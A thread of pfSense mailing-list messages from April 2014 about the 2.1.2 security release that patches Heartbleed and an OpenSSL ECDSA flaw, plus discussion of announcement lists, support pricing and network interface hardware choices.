2.1.2 wasn’t “UP”. Chris cut a version of something he called “2.1.2” that he indicated *might* become 2.1.2, but it was incomplete. So I asked him to pull it back down. Jim On Apr 9, 2014, at 4:59 PM, Ryan Coleman ryanjc...@me.com wrote: There was a post to the list at 0400 central US today that 2.1.2 was up but then he pulled it. I haven’t heard anything since then. You could turn off SSL or ust not use it for the time being from anywhere you don’t trust the system - if they don’t see traffic to the firewall they cannot snoop your information. On Apr 9, 2014, at 3:40 PM, mayak ma...@australsat.com wrote: snip hi all, any news? my routers feel exposed :-) god bless pfsense. m ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] 2.1.2-RELEASE up for testing
The final testing (testing updates against the real update servers, which can’t be effectively simulated) is happening now. jim On Apr 10, 2014, at 12:50 PM, k_o_l k_...@hotmail.com wrote: Any update to when the fix will be released?! -Original Message- From: List [mailto:list-boun...@lists.pfsense.org] On Behalf Of Chris Buechler Sent: Wednesday, April 09, 2014 5:04 AM To: pfSense support and discussion Subject: Re: [pfSense] 2.1.2-RELEASE up for testing Scratch that - that just missed a commit for another security fix, it's rebuilding now. On Wed, Apr 9, 2014 at 3:48 AM, Chris Buechler c...@pfsense.org wrote: Normally we wouldn't put these out to the general public at this stage, but a few people are wanting the OpenSSL fix ASAP, and I already posted it to the forum. I've upgraded a handful of production systems and it seems fine, but still a number of things we'll verify before announcing it more widely and sending it to the mirrors and auto-update. I think this is what will become 2.1.2 release. https://files.pfsense.org/cmb/2.1.2-REL-testing/ also mirrored at: http://files.nyi.pfsense.org/cmb/2.1.2-REL-testing/ Those are signed and everything, just a matter of moving them into place if things test out fine. ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list
[pfSense] pfSense 2.1.2 is released
https://blog.pfsense.org/?p=1253 pfSense release 2.1.2 is now available. pfSense release 2.1.2 follows less than a week after pfSense release 2.1.1, and is primarily a security release. The Heartbleed OpenSSL bug and another OpenSSL bug which enables a side-channel attack are both covered by the following security announcements: • pfSense-SA-14_04.openssl • FreeBSD-SA-14:06.openssl • CVE-2014-0160 (Heartbleed) • CVE-2014-0076 (ECDSA Flaw) Packages also have their own independent fixes and need updating. During the firmware update process the packages will be properly reinstalled. If this fails for any reason, uninstall and then reinstall packages to ensure that the latest version of the binaries is in use. Other Fixes • On packages that use row_helper, when user clicks on an add or delete button, the page scrolls to top. #3569 • Correct a typo on function name in Captive Portal bandwidth allocation. • Make extra sure that we do not start multiple instances of dhcpleases if, for example, the PID is stale or invalid, and there is still a running instance. • Fix for CRL editing. Use an alphanumeric test rather than purely is_numericint because the ID is generated by uniqid and is not purely numeric. #3591 You will want to perform a full security audit of your pfSense installations, renewing any passwords, generating or fitting new certificates, placing the old certificates on a CRL, etc. ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] pfSense 2.1.2 is released
On Apr 10, 2014, at 4:10 PM, Volker Kuhlmann hid...@paradise.net.nz wrote: On Fri 11 Apr 2014 07:23:52 NZST +1200, Jim Thompson wrote: pfSense release 2.1.2 is now available. Thank you for all the quick work! May I ask though why this isn't simultaneously posted on pfsense-announce and pfsense-security-announce? In particular, if the security-announce list was to be used as a reliable source of critical information, posting the 2.1.2 release announcement with the heartbleed fix is not optional??? It was posted on announce@, but it seems that I’m moderated there. This is why my 2.1.1 release announcement was also held. I’ve pushed the message through. security@ is for posting SAs Jim ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] pfSense 2.1.2 is released
On Apr 10, 2014, at 4:25 PM, Dimitri Rodis dimit...@integritasystems.com wrote: Can we also get information as to which versions of pfSense are affected aside from 2.1.1? Or is 2.1.1 the only affected version? https://pfsense.org/security/advisories/pfSense-SA-14_04.openssl.asc ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] pfSense 2.1.2 is released
They're built; we're waiting on Amazon. -- Jim On Apr 11, 2014, at 22:41, linbloke linbl...@fastmail.fm wrote: On 11/04/2014 5:23 am, Jim Thompson wrote: https://blog.pfsense.org/?p=1253 pfSense release 2.1.2 is now available. pfSense release 2.1.2 follows less than a week after pfSense release 2.1.1, and is primarily a security release. Thanks for the new release. Any sign of updated AWS AMIs? Regards, lb The Heartbleed OpenSSL bug and another OpenSSL bug which enables a side-channel attack are both covered by the following security announcements: • pfSense-SA-14_04.openssl • FreeBSD-SA-14:06.openssl • CVE-2014-0160 (Heartbleed) • CVE-2014-0076 (ECDSA Flaw) Packages also have their own independent fixes and need updating. During the firmware update process the packages will be properly reinstalled. If this fails for any reason, uninstall and then reinstall packages to ensure that the latest version of the binaries is in use. Other Fixes • On packages that use row_helper, when user clicks on an add or delete button, the page scrolls to top. #3569 • Correct a typo on function name in Captive Portal bandwidth allocation. • Make extra sure that we do not start multiple instances of dhcpleases if, for example, the PID is stale or invalid, and there is still a running instance. • Fix for CRL editing. Use an alphanumeric test rather than purely is_numericint because the ID is generated by uniqid and is not purely numeric. #3591 You will want to perform a full security audit of your pfSense installations, renewing any passwords, generating or fitting new certificates, placing the old certificates on a CRL, etc. ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] pfSense 2.1.2 is released
On Apr 12, 2014, at 18:55, Volker Kuhlmann hid...@paradise.net.nz wrote: On Fri 11 Apr 2014 18:43:18 NZST +1200, Ryan Coleman wrote: He gave you an option to subscribe to the list. You seem to have missed the point I was making: critical security fixes (the 2.1.2 release in this case, unless I am misunderstanding) were not posted to security-announce@. The posting to announce@ only happened, because of initial setup problems, after I pointed out it was missing. Volker Technically, the SA was posted, but the guy (Jeremy) who setup the list hasn't given me mod privs yet, and they are stuck in the mod queue. So, actually, I've not missed your point. The whole security-announce setup is quite new. Patience, please, while the kinks are worked out. Jim ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] pfSense 2.1.2 is released
On Apr 16, 2014, at 4:34 PM, Brian Candler b.cand...@pobox.com wrote: On 15/04/2014 20:12, Jim Thompson wrote: We dropped the price, too. -- Jim Which price are you referring to? On the EC2 instance(s). I see that a support subscription is now $200 for 2 hours plus $200 per extra hour. $400 for the initial 2 hours, $200/hr after that. The one my client purchased a couple of months ago was $600 for 5 hours and (I think) $100 per extra hour. That doesn't sound like a price drop to me :-) The initial buy-in is $400, not $600. ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] Interface options for pfsense
On Apr 22, 2014, at 10:39, Stefan Baur newsgroups.ma...@stefanbaur.de wrote: In fact, I'd be petty disappointed, too, if a newer pfSense release stopped working on my hardware and it the whole issue appeared out of the blue (== no hwe driver no longer supported or similar notice in the release notes). Your potential disappointment is noted. It's not like we disabled the hme driver. We have no ability to test it, since we don't have one of these cards. Nor are we likely to invest in one. I can think of a half dozen reasons that could cause the card to run on 2.0.3, and not run on 2.1. Jim ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] Interface options for pfsense
On Apr 20, 2014, at 5:32 PM, Volker Kuhlmann list0...@paradise.net.nz wrote: I've been running pfsense for many years (and been very happy with it) on scrapped PCs with a Sun 4-port Ethernet PCI card because I need 5 Ethernet ports. Now freebsd dieing on the hme driver effectively turns those cards into scrap and I'm stuck. What are alternatives now? Are there any other 4-port cards that are supported by pfsense in practice (not just in theory), that are also affordable? You’ll need to define “affordable”. You’ll also need to state if you’re looking for PCI, PCI-x or PCIe cards. The power consumption (and box volume) of scrapped PCs is not optimal, and I've been looking at moving to a small single-board. Soekris was always underpowered and overpriced IMHO, and PCEngines underpowered, until they released the exciting APU series recently. They all only have 3 Ethernet ports though, which is the stopper here. What mPCIe Ethernet cards are supported by pfsense that people can recommend? We’ve run some experiments with various Intel-based cards in a NUC (we’re building a rack mount for them). They work, but it’s not an inexpensive solution. Are there any USB Ethernet adapters that actually work with pfsense? Reliably? I am looking for reports from those who have tried, not the freebsd supported HW list - that list is too long and not really trustworthy (I have a USB wifi adapter which runs for 10min then makes pfsense kernel panic). WiFi isn’t recommended until at least pfSense 2.2, if then. The frequently recommended option of using VLANs may look good for larger commercial networks, but just buying a VLAN capable switch costs more than a suitable pfsense box and brings the power budget of the combination to the same level as a scrapped PC - with the latter winning hands down on cost. You can pick up the 8 port HP switches (e.g. 1810-8G aka J9802A) for less than $100 these days. No fan, so noise-free. 8W maximum. Real SNMP implementation, supports 802.1q, jumbo packets, etc. When we lived in Hawaii, (expensive power), I used to run a 24-port version of this (1810-24G aka J9803A). Still no fan, 24 10/100/1000 ports, of these can support SFP. Current price is less than $200 on newegg, and probably way more switch than you need. These days my “home lab” (the test lab at work) has a dedicated room, dedicated AC, several racks, and is connected via redundant 10Gbps links, with a backup fiber link at 100Mbps, so my home network is just an APU, a 16-port dumb switch, and a couple 802.11 APs. If I decided to upgrade the Grande connection to 1Gbps or, when Google fiber arrives, I’ll probably replace all that with an SDN (OpenFlow) setup. Jim ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] Interface options for pfsense
On Apr 22, 2014, at 12:27 PM, Stefan Baur newsgroups.ma...@stefanbaur.de wrote: Am 22.04.2014 18:29, schrieb Jim Thompson: It's not like we disabled the hme driver. Nobody accused you of intentionally disabling it. Manure happens. :-) Relax. We have no ability to test it, since we don't have one of these cards. Nor are we likely to invest in one. Over in the Interface yoyo thread, Message-ID 5355875d.9050...@athompso.net, Adam Thompson wrote: If any of the devs want to test this hardware, I have at least one just sitting on the shelf I can ship to you. (I thought I had 3 or 4 of them, maybe they're still sitting in the E450s that are also sitting on the shelf. Well, actually on the ground, but only because I don't have any shelves that can hold *those*.) If Adam is willing to donate his spare card to you dev folks, and maybe Volker buys a Gold Membership (in case he doesn't have one already), would that significantly increase the chances of having a working hme driver in a future release? :-) That would require finding a PC with a PCI slot, and time. ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] Interface options for pfsense
On Apr 22, 2014, at 3:42 PM, Volker Kuhlmann hid...@paradise.net.nz wrote: On Wed 23 Apr 2014 05:02:59 NZST +1200, Jim Thompson wrote: Are there any USB Ethernet adapters that actually work with pfsense? Reliably? I am looking for reports from those who have tried, not the freebsd supported HW list - that list is too long and not really trustworthy (I have a USB wifi adapter which runs for 10min then makes pfsense kernel panic). WiFi isn't recommended until at least pfSense 2.2, if then. OK, thanks Jim, good to know. Do you mean this to apply to USB wifi only? No. There are cheap mPCIe atheros-based wifi cards for the PCEngine APU board. Are they known to be reliable? Yes, I know. We sell thousands of them every month, but not for use in pfSense. Maybe with 2.2 the situation will improve. You can pick up the 8 port HP switches (e.g. 1810-8G aka J9802A) for less than $100 these days. No fan, so noise-free. 8W maximum. Yes, thank you for mentioning that - I had seen that yesterday and their power specs had escaped me when I looked at them previously (some of those similar models do guzzle it). That's my plan B, but I really don't like to use VLANs when I can avoid the clutter and complexity (more bugs, more time spent). A pfsense box with more ports is much easier. You asked. BTW, VLANs end up as less clutter, not more. jim ___ List mailing list List@lists.pfsense.org https://lists.pfsense.org/mailman/listinfo/list